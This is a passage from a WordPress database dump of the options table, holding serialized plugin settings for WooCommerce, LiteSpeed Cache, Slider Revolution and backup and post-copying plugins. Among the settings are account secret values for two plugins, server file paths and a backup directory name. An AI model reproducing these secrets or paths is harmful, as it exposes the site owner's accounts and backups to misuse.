thanks\";}s:8:\"complete\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:1:\"1\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:27:\"I\'ve already given a review\";}s:5:\"later\";a:3:{s:3:\"url\";a:1:{s:28:\"sbi_ignore_rating_notice_nag\";s:5:\"later\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:12:\"Ask Me Later\";}}s:4:\"wait\";s:2:\"14\";}s:8:\"discount\";a:8:{s:5:\"title\";s:28:\"Attention {platform} Lovers!\";s:7:\"content\";s:221:\"Exclusive offer! We don\'t run promotions very often, but for a limited time we\'re offering {amount} off our Pro version to all users of our free {plugin} plugin.\";s:2:\"id\";s:8:\"discount\";s:6:\"amount\";s:3:\"60%\";s:5:\"image\";s:12:\"sbi-icon.png\";s:13:\"image_overlay\";s:7:\"60% off\";s:4:\"btns\";a:2:{s:7:\"primary\";a:4:{s:3:\"url\";s:127:\"https://smashballoon.com/{slug}/?utm_campaign={campaign}&utm_source=notices&utm_medium=newuser&discount={lowerplatform}thankyou\";s:5:\"class\";s:32:\"sbi_notice_dismiss sbi_offer_btn\";s:4:\"text\";s:14:\"Get this offer\";s:4:\"attr\";a:1:{i:0;s:11:\"targetblank\";}}s:7:\"dismiss\";a:3:{s:3:\"url\";a:1:{s:31:\"sbi_ignore_new_user_sale_notice\";s:6:\"always\";}s:5:\"class\";s:18:\"sbi_notice_dismiss\";s:4:\"text\";s:18:\"I\'m not interested\";}}s:4:\"wait\";s:2:\"30\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(320959,'sbi_notifications','a:4:{s:6:\"update\";i:1697569976;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(320962,'sbi_cron_report','a:1:{s:5:\"notes\";a:2:{s:8:\"time_ran\";s:19:\"2024-01-19 21:19:55\";s:20:\"num_found_transients\";i:0;}}','no'),(115924,'woocommerce_unforce_ssl_checkout','no','yes'),(115927,'woocommerce_task_list_hidden','yes','yes'),(97404,'litespeed.conf.optm-css_comb_ext_inl','','yes'),(153147,'_transient_wc_attribute_taxonomies','a:0:{}','yes'),(153145,'_transient_woocommerce_reports-transient-version','1646946457','yes'),(153150,'woocommerce_admin_report_export_status','a:0:{}','yes'),(324030,'revslider-additions','O:8:\"stdClass\":2:{s:9:\"templates\";O:8:\"stdClass\":3:{s:9:\"tutorials\";a:3:{i:0;O:8:\"stdClass\":2:{s:5:\"title\";s:19:\"Rapid Fire Overview\";s:3:\"url\";s:49:\"https://www.youtube.com/watch?v=LRNTFu-MFgw&t=25s\";}i:1;O:8:\"stdClass\":2:{s:5:\"title\";s:34:\"Responsiveness in Edited Templates\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=hP4oV8SWgKY\";}i:2;O:8:\"stdClass\":2:{s:5:\"title\";s:16:\"Animation Basics\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=nn3azizwpbs\";}}s:5:\"guide\";O:8:\"stdClass\":3:{s:5:\"title\";s:78:\"Require Expert Technical Advice?
Submit a Ticket for Dedicated 1on1 Help.\";s:3:\"url\";s:36:\"https://support.sliderrevolution.com\";s:3:\"img\";s:67:\"//updates.themepunch-ext-a.tools/banners/default_template_guide.jpg\";}s:6:\"bottom\";O:8:\"stdClass\":2:{s:5:\"title\";s:32:\"Load A Template From The Library\";s:3:\"img\";s:61:\"//updates.themepunch-ext-a.tools/banners/guide_mod_banner.png\";}}s:7:\"selling\";b:1;}','yes'),(324031,'rs-addons-counter','1','yes'),(312363,'https_detection_errors','a:0:{}','yes'),(312375,'woocommerce_marketplace_suggestions','a:2:{s:11:\"suggestions\";a:28:{i:0;a:4:{s:4:\"slug\";s:28:\"product-edit-meta-tab-header\";s:7:\"context\";s:28:\"product-edit-meta-tab-header\";s:5:\"title\";s:22:\"Recommended extensions\";s:13:\"allow-dismiss\";b:0;}i:1;a:6:{s:4:\"slug\";s:39:\"product-edit-meta-tab-footer-browse-all\";s:7:\"context\";s:28:\"product-edit-meta-tab-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:2;a:9:{s:4:\"slug\";s:46:\"product-edit-mailchimp-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-mailchimp\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/mailchimp-for-memberships.svg\";s:5:\"title\";s:25:\"Mailchimp for Memberships\";s:4:\"copy\";s:79:\"Completely automate your email lists by syncing membership changes to Mailchimp\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/mailchimp-woocommerce-memberships/\";}i:3;a:9:{s:4:\"slug\";s:19:\"product-edit-addons\";s:7:\"product\";s:26:\"woocommerce-product-addons\";s:14:\"show-if-active\";a:2:{i:0;s:25:\"woocommerce-subscriptions\";i:1;s:20:\"woocommerce-bookings\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-add-ons.svg\";s:5:\"title\";s:15:\"Product Add-Ons\";s:4:\"copy\";s:93:\"Offer add-ons like gift wrapping, special messages or other special options for your products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-add-ons/\";}i:4;a:9:{s:4:\"slug\";s:46:\"product-edit-woocommerce-subscriptions-gifting\";s:7:\"product\";s:33:\"woocommerce-subscriptions-gifting\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/gifting-for-subscriptions.svg\";s:5:\"title\";s:25:\"Gifting for Subscriptions\";s:4:\"copy\";s:70:\"Let customers buy subscriptions for others - they\'re the ultimate gift\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/woocommerce-subscriptions-gifting/\";}i:5;a:9:{s:4:\"slug\";s:42:\"product-edit-teams-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-for-teams\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:112:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/teams-for-memberships.svg\";s:5:\"title\";s:21:\"Teams for Memberships\";s:4:\"copy\";s:123:\"Adds B2B functionality to WooCommerce Memberships, allowing sites to sell team, group, corporate, or family member accounts\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/teams-woocommerce-memberships/\";}i:6;a:8:{s:4:\"slug\";s:29:\"product-edit-variation-images\";s:7:\"product\";s:39:\"woocommerce-additional-variation-images\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/additional-variation-images.svg\";s:5:\"title\";s:27:\"Additional Variation Images\";s:4:\"copy\";s:72:\"Showcase your products in the best light with a image for each variation\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:73:\"https://woocommerce.com/products/woocommerce-additional-variation-images/\";}i:7;a:9:{s:4:\"slug\";s:47:\"product-edit-woocommerce-subscription-downloads\";s:7:\"product\";s:34:\"woocommerce-subscription-downloads\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:113:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscription-downloads.svg\";s:5:\"title\";s:22:\"Subscription Downloads\";s:4:\"copy\";s:57:\"Give customers special downloads with their subscriptions\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:68:\"https://woocommerce.com/products/woocommerce-subscription-downloads/\";}i:8;a:8:{s:4:\"slug\";s:31:\"product-edit-min-max-quantities\";s:7:\"product\";s:30:\"woocommerce-min-max-quantities\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/min-max-quantities.svg\";s:5:\"title\";s:18:\"Min/Max Quantities\";s:4:\"copy\";s:81:\"Specify minimum and maximum allowed product quantities for orders to be completed\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/min-max-quantities/\";}i:9;a:8:{s:4:\"slug\";s:28:\"product-edit-name-your-price\";s:7:\"product\";s:27:\"woocommerce-name-your-price\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/name-your-price.svg\";s:5:\"title\";s:15:\"Name Your Price\";s:4:\"copy\";s:70:\"Let customers pay what they want - useful for donations, tips and more\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/name-your-price/\";}i:10;a:8:{s:4:\"slug\";s:42:\"product-edit-woocommerce-one-page-checkout\";s:7:\"product\";s:29:\"woocommerce-one-page-checkout\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/one-page-checkout.svg\";s:5:\"title\";s:17:\"One Page Checkout\";s:4:\"copy\";s:92:\"Don\'t make customers click around - let them choose products, checkout & pay all on one page\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/woocommerce-one-page-checkout/\";}i:11;a:9:{s:4:\"slug\";s:24:\"product-edit-automatewoo\";s:7:\"product\";s:11:\"automatewoo\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:23:\"Automate your marketing\";s:4:\"copy\";s:89:\"Win customers and keep them coming back with a nearly endless range of powerful workflows\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:45:\"https://woocommerce.com/products/automatewoo/\";}i:12;a:4:{s:4:\"slug\";s:19:\"orders-empty-header\";s:7:\"context\";s:24:\"orders-list-empty-header\";s:5:\"title\";s:20:\"Tools for your store\";s:13:\"allow-dismiss\";b:0;}i:13;a:6:{s:4:\"slug\";s:30:\"orders-empty-footer-browse-all\";s:7:\"context\";s:24:\"orders-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:14;a:8:{s:4:\"slug\";s:19:\"orders-empty-wc-pay\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-payments\";s:4:\"icon\";s:111:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/woocommerce-payments.svg\";s:5:\"title\";s:20:\"WooCommerce Payments\";s:4:\"copy\";s:125:\"Securely accept payments and manage transactions directly from your WooCommerce dashboard – no setup costs or monthly fees.\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-payments/\";}i:15;a:8:{s:4:\"slug\";s:19:\"orders-empty-zapier\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:18:\"woocommerce-zapier\";s:4:\"icon\";s:97:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/zapier.svg\";s:5:\"title\";s:6:\"Zapier\";s:4:\"copy\";s:88:\"Save time and increase productivity by connecting your store to more than 1000+ services\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/woocommerce-zapier/\";}i:16;a:8:{s:4:\"slug\";s:30:\"orders-empty-shipment-tracking\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:29:\"woocommerce-shipment-tracking\";s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipment-tracking.svg\";s:5:\"title\";s:17:\"Shipment Tracking\";s:4:\"copy\";s:86:\"Let customers know when their orders will arrive by adding shipment tracking to emails\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:51:\"https://woocommerce.com/products/shipment-tracking/\";}i:17;a:8:{s:4:\"slug\";s:32:\"orders-empty-table-rate-shipping\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:31:\"woocommerce-table-rate-shipping\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/table-rate-shipping.svg\";s:5:\"title\";s:19:\"Table Rate Shipping\";s:4:\"copy\";s:122:\"Advanced, flexible shipping. Define multiple shipping rates based on location, price, weight, shipping class or item count\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/table-rate-shipping/\";}i:18;a:8:{s:4:\"slug\";s:40:\"orders-empty-shipping-carrier-extensions\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipping-carrier-extensions.svg\";s:5:\"title\";s:27:\"Shipping Carrier Extensions\";s:4:\"copy\";s:116:\"Show live rates from FedEx, UPS, USPS and more directly on your store - never under or overcharge for shipping again\";s:11:\"button-text\";s:13:\"Find Carriers\";s:8:\"promoted\";s:26:\"category-shipping-carriers\";s:3:\"url\";s:99:\"https://woocommerce.com/product-category/woocommerce-extensions/shipping-methods/shipping-carriers/\";}i:19;a:8:{s:4:\"slug\";s:32:\"orders-empty-google-product-feed\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-product-feeds\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/google-product-feed.svg\";s:5:\"title\";s:19:\"Google Product Feed\";s:4:\"copy\";s:76:\"Increase sales by letting customers find you when they\'re shopping on Google\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/google-product-feed/\";}i:20;a:4:{s:4:\"slug\";s:35:\"products-empty-header-product-types\";s:7:\"context\";s:26:\"products-list-empty-header\";s:5:\"title\";s:23:\"Other types of products\";s:13:\"allow-dismiss\";b:0;}i:21;a:6:{s:4:\"slug\";s:32:\"products-empty-footer-browse-all\";s:7:\"context\";s:26:\"products-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:22;a:8:{s:4:\"slug\";s:30:\"products-empty-product-vendors\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-vendors\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-vendors.svg\";s:5:\"title\";s:15:\"Product Vendors\";s:4:\"copy\";s:47:\"Turn your store into a multi-vendor marketplace\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-vendors/\";}i:23;a:8:{s:4:\"slug\";s:26:\"products-empty-memberships\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:23:\"woocommerce-memberships\";s:4:\"icon\";s:102:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/memberships.svg\";s:5:\"title\";s:11:\"Memberships\";s:4:\"copy\";s:76:\"Give members access to restricted content or products, for a fee or for free\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:57:\"https://woocommerce.com/products/woocommerce-memberships/\";}i:24;a:9:{s:4:\"slug\";s:35:\"products-empty-woocommerce-deposits\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-deposits\";s:14:\"show-if-active\";a:1:{i:0;s:20:\"woocommerce-bookings\";}s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/deposits.svg\";s:5:\"title\";s:8:\"Deposits\";s:4:\"copy\";s:75:\"Make it easier for customers to pay by offering a deposit or a payment plan\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-deposits/\";}i:25;a:8:{s:4:\"slug\";s:40:\"products-empty-woocommerce-subscriptions\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-subscriptions\";s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:13:\"Subscriptions\";s:4:\"copy\";s:97:\"Let customers subscribe to your products or services and pay on a weekly, monthly or annual basis\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:59:\"https://woocommerce.com/products/woocommerce-subscriptions/\";}i:26;a:8:{s:4:\"slug\";s:35:\"products-empty-woocommerce-bookings\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-bookings\";s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/bookings.svg\";s:5:\"title\";s:8:\"Bookings\";s:4:\"copy\";s:99:\"Allow customers to book appointments, make reservations or rent equipment without leaving your site\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-bookings/\";}i:27;a:8:{s:4:\"slug\";s:30:\"products-empty-product-bundles\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-bundles\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-bundles.svg\";s:5:\"title\";s:15:\"Product Bundles\";s:4:\"copy\";s:49:\"Offer customizable bundles and assembled products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-bundles/\";}}s:7:\"updated\";i:1691835651;}','no'),(312356,'user_count','3','no'),(312357,'db_upgraded','','yes'),(312347,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(312348,'disallowed_keys','','no'),(312349,'comment_previously_approved','1','yes'),(312350,'auto_plugin_theme_update_emails','a:1:{s:27:\"js_composer/js_composer.php\";s:3:\"7.0\";}','no'),(312351,'auto_update_core_dev','enabled','yes'),(312352,'auto_update_core_minor','enabled','yes'),(312353,'auto_update_core_major','enabled','no'),(312354,'wp_force_deactivated_plugins','a:0:{}','yes'),(308203,'litespeed.gui._summary','a:2:{s:11:\"new_version\";i:1690968216;s:5:\"score\";i:1691313816;}','yes'),(336343,'wp_attachment_pages_enabled','1','yes'),(312316,'litespeed.admin_display._summary','a:4:{s:11:\"new_version\";i:1690968216;s:5:\"score\";i:1691313816;s:22:\"new_version.last_check\";i:1692873755;s:13:\"new_version.v\";s:5:\"4.4.5\";}','yes'),(320272,'recovery_mode_email_last_sent','1694408784','yes'),(323990,'mailmunch_activation_date','1694406169','yes'),(324035,'rs_cache_overlay','6.6.16','yes'),(320102,'litespeed.conf.__activation','-1','yes'),(320103,'litespeed.purge.queue','X-LiteSpeed-Purge: public,*','yes'),(320104,'litespeed.purge.queue2','-1','yes'),(320106,'litespeed.data.upgrading','-1','yes'),(320112,'litespeed.conf.debug-exc_strings','[]','yes'),(320113,'litespeed.conf.optm-ucss_inline','','yes'),(320114,'litespeed.conf.optm-ucss_whitelist','[]','yes'),(320115,'litespeed.conf.optm-ucss_file_exc_inline','[]','yes'),(320116,'litespeed.conf.optm-ucss_exc','[]','yes'),(320117,'litespeed.conf.optm-js_delay_inc','[]','yes'),(320118,'litespeed.conf.optm-html_lazy','[]','yes'),(320119,'litespeed.conf.optm-ccss_per_url','','yes'),(320120,'litespeed.conf.optm-gm_js_exc','[]','yes'),(320121,'litespeed.conf.optm-guest_only','1','yes'),(320122,'litespeed.conf.media-add_missing_sizes','','yes'),(320123,'litespeed.conf.media-vpi','','yes'),(320124,'litespeed.conf.media-vpi_cron','','yes'),(320125,'litespeed.conf.qc-token','','yes'),(320126,'litespeed.conf.qc-nameservers','','yes'),(320138,'litespeed.gui.lscwp_whm_install','-1','yes'),(320139,'litespeed.gui.dismiss','-1','yes'),(320075,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:598;s:3:\"all\";i:593;s:9:\"moderated\";s:3:\"541\";s:8:\"approved\";s:2:\"52\";s:12:\"post-trashed\";s:4:\"9576\";s:4:\"spam\";s:1:\"5\";s:5:\"trash\";s:3:\"177\";}','yes'),(320093,'litespeed.admin_display.messages','[\"

All QUIC.cloud service queues have been cleared.<\\/p><\\/div>\",\"

Purged all caches successfully.<\\/p><\\/div>\"]','yes'),(320108,'litespeed.conf.guest','','yes'),(320109,'litespeed.conf.guest_optm','','yes'),(320110,'litespeed.conf.guest_uas','[\"Lighthouse\",\"GTmetrix\",\"Google\",\"Pingdom\",\"bot\",\"PTST\",\"HeadlessChrome\"]','yes'),(320111,'litespeed.conf.guest_ips','[\"208.70.247.157\",\"172.255.48.130\",\"172.255.48.131\",\"172.255.48.132\",\"172.255.48.133\",\"172.255.48.134\",\"172.255.48.135\",\"172.255.48.136\",\"172.255.48.137\",\"172.255.48.138\",\"172.255.48.139\",\"172.255.48.140\",\"172.255.48.141\",\"172.255.48.142\",\"172.255.48.143\",\"172.255.48.144\",\"172.255.48.145\",\"172.255.48.146\",\"172.255.48.147\",\"52.229.122.240\",\"104.214.72.101\",\"13.66.7.11\",\"13.85.24.83\",\"13.85.24.90\",\"13.85.82.26\",\"40.74.242.253\",\"40.74.243.13\",\"40.74.243.176\",\"104.214.48.247\",\"157.55.189.189\",\"104.214.110.135\",\"70.37.83.240\",\"65.52.36.250\",\"13.78.216.56\",\"52.162.212.163\",\"23.96.34.105\",\"65.52.113.236\",\"172.255.61.34\",\"172.255.61.35\",\"172.255.61.36\",\"172.255.61.37\",\"172.255.61.38\",\"172.255.61.39\",\"172.255.61.40\",\"104.41.2.19\",\"191.235.98.164\",\"191.235.99.221\",\"191.232.194.51\",\"52.237.235.185\",\"52.237.250.73\",\"52.237.236.145\",\"104.211.143.8\",\"104.211.165.53\",\"52.172.14.87\",\"40.83.89.214\",\"52.175.57.81\",\"20.188.63.151\",\"20.52.36.49\",\"52.246.165.153\",\"51.144.102.233\",\"13.76.97.224\",\"102.133.169.66\",\"52.231.199.170\",\"13.53.162.7\",\"40.123.218.94\"]','yes'),(317673,'auto_update_plugins','a:5:{i:0;s:36:\"contact-form-7/wp-contact-form-7.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:31:\"envato-market/envato-market.php\";i:3;s:45:\"enable-media-replace/enable-media-replace.php\";i:4;s:27:\"js_composer/js_composer.php\";}','no'),(317734,'_irb_h_bn_review','a:3:{s:5:\"users\";a:0:{}s:13:\"backup-backup\";i:1692686767;s:17:\"copy-delete-posts\";i:1692699413;}','yes'),(317729,'bmi_initial_installation_version','1.2.9','yes'),(317731,'analyst_cache','s:6:\"a:0:{}\";','yes'),(317740,'analyst_notices','s:508:\"O:29:\"Analyst\\Notices\\NoticeFactory\":1:{s:10:\"\0*\0notices\";a:2:{i:1;O:22:\"Analyst\\Notices\\Notice\":4:{s:5:\"\0*\0id\";s:13:\"64e4737fa681b\";s:7:\"\0*\0body\";s:36:\"Thank you for confirming your email.\";s:12:\"\0*\0accountId\";s:16:\"6l8b75dw0p3qkv9z\";s:13:\"\0*\0pluginName\";s:16:\"Backup Migration\";}i:3;O:22:\"Analyst\\Notices\\Notice\":4:{s:5:\"\0*\0id\";s:13:\"64e4acdaa594e\";s:7:\"\0*\0body\";s:36:\"Thank you for confirming your email.\";s:12:\"\0*\0accountId\";s:16:\"ovgxe3xq075ladbp\";s:13:\"\0*\0pluginName\";s:23:\"Copy & Delete Posts\";}}}\";','yes'),(317733,'BMI::STORAGE::LOCAL::PATH','/home/tummmyov/tummyrevolution.com/wp-content/backup-migration-WzikbhVxSB','yes'),(317735,'bmi_gdrive_banner_dismissed','1','yes'),(317736,'bmi_hotfixes','a:2:{i:0;s:14:\"BMI_D20_M07_01\";i:1;s:18:\"BMI_D17_M12_Y21_02\";}','yes'),(317741,'analyst_accounts_data','s:765:\"O:26:\"Account\\AccountDataFactory\":1:{s:11:\"\0*\0accounts\";a:2:{i:0;O:19:\"Account\\AccountData\":7:{s:5:\"\0*\0id\";s:16:\"6l8b75dw0p3qkv9z\";s:9:\"\0*\0secret\";s:40:\"94fe452dd8c8cd2482fd0ae0d2532b02aa55b734\";s:7:\"\0*\0path\";s:85:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/backup-backup.php\";s:14:\"\0*\0isInstalled\";b:0;s:12:\"\0*\0isOptedIn\";b:1;s:11:\"\0*\0isSigned\";b:1;s:20:\"\0*\0isInstallResolved\";b:1;}i:1;O:19:\"Account\\AccountData\":7:{s:5:\"\0*\0id\";s:16:\"ovgxe3xq075ladbp\";s:9:\"\0*\0secret\";s:40:\"b4de5ed2ba7be687e233d152ec1e8fd116052ab0\";s:7:\"\0*\0path\";s:93:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/copy-delete-posts.php\";s:14:\"\0*\0isInstalled\";b:0;s:12:\"\0*\0isOptedIn\";b:1;s:11:\"\0*\0isSigned\";b:1;s:20:\"\0*\0isInstallResolved\";b:1;}}}\";','yes'),(319015,'wp_calendar_block_has_published_posts','1','yes'),(318345,'_cdp_no_intro','a:1:{i:0;i:1;}','yes'),(318322,'_cdp_preselections','a:1:{i:1;s:7:\"default\";}','yes'),(318312,'_cdp_review','a:2:{s:9:\"installed\";i:1692699412;s:5:\"users\";a:0:{}}','yes'),(318313,'_cdp_globals','a:4:{s:9:\"afterCopy\";s:1:\"1\";s:13:\"postConverter\";s:1:\"1\";s:6:\"others\";a:14:{s:17:\"cdp-content-pages\";s:4:\"true\";s:17:\"cdp-content-posts\";s:4:\"true\";s:18:\"cdp-content-custom\";s:4:\"true\";s:17:\"cdp-display-posts\";s:4:\"true\";s:16:\"cdp-display-edit\";s:4:\"true\";s:17:\"cdp-display-admin\";s:4:\"true\";s:16:\"cdp-display-bulk\";s:4:\"true\";s:21:\"cdp-display-gutenberg\";s:4:\"true\";s:19:\"cdp-references-post\";s:5:\"false\";s:19:\"cdp-references-edit\";s:5:\"false\";s:24:\"cdp-premium-hide-tooltip\";s:5:\"false\";s:26:\"cdp-premium-replace-domain\";s:5:\"false\";s:18:\"cdp-premium-import\";s:5:\"false\";s:20:\"cdp-menu-in-settings\";s:5:\"false\";}s:5:\"roles\";a:7:{s:13:\"administrator\";s:4:\"true\";s:6:\"editor\";s:5:\"false\";s:6:\"author\";s:5:\"false\";s:11:\"contributor\";s:5:\"false\";s:10:\"subscriber\";s:5:\"false\";s:8:\"customer\";s:5:\"false\";s:12:\"shop_manager\";s:5:\"false\";}}','yes'),(318314,'_cdp_profiles','a:1:{s:7:\"default\";a:25:{s:5:\"names\";a:4:{s:6:\"prefix\";s:13:\"jam jar 3 way\";s:6:\"suffix\";s:10:\"#[Counter]\";s:6:\"format\";s:1:\"1\";s:7:\"display\";s:7:\"Default\";}s:5:\"title\";s:4:\"true\";s:4:\"date\";s:5:\"false\";s:6:\"status\";s:5:\"false\";s:4:\"slug\";s:4:\"true\";s:7:\"excerpt\";s:4:\"true\";s:7:\"content\";s:4:\"true\";s:7:\"f_image\";s:4:\"true\";s:8:\"template\";s:4:\"true\";s:6:\"format\";s:4:\"true\";s:6:\"author\";s:4:\"true\";s:8:\"password\";s:4:\"true\";s:11:\"attachments\";s:5:\"false\";s:8:\"children\";s:5:\"false\";s:8:\"comments\";s:5:\"false\";s:10:\"menu_order\";s:4:\"true\";s:8:\"category\";s:4:\"true\";s:8:\"post_tag\";s:4:\"true\";s:8:\"taxonomy\";s:4:\"true\";s:8:\"nav_menu\";s:4:\"true\";s:13:\"link_category\";s:4:\"true\";s:12:\"all_metadata\";s:5:\"false\";s:3:\"woo\";s:5:\"false\";s:9:\"usmplugin\";s:5:\"false\";s:5:\"yoast\";s:5:\"false\";}}','yes'),(318315,'_cdp_default_setup','1','yes'),(318316,'_tifm_feature_enabled','disabled','yes'),(318317,'_tifm_disable_feature_forever','1','yes'),(318318,'_tifm_force_disable_feature_fix','1','yes'),(318968,'cdp_copy_logs_times','a:2:{i:0;a:6:{s:6:\"amount\";s:1:\"1\";s:4:\"time\";d:0.026340007781982422;s:6:\"perOne\";d:0.02634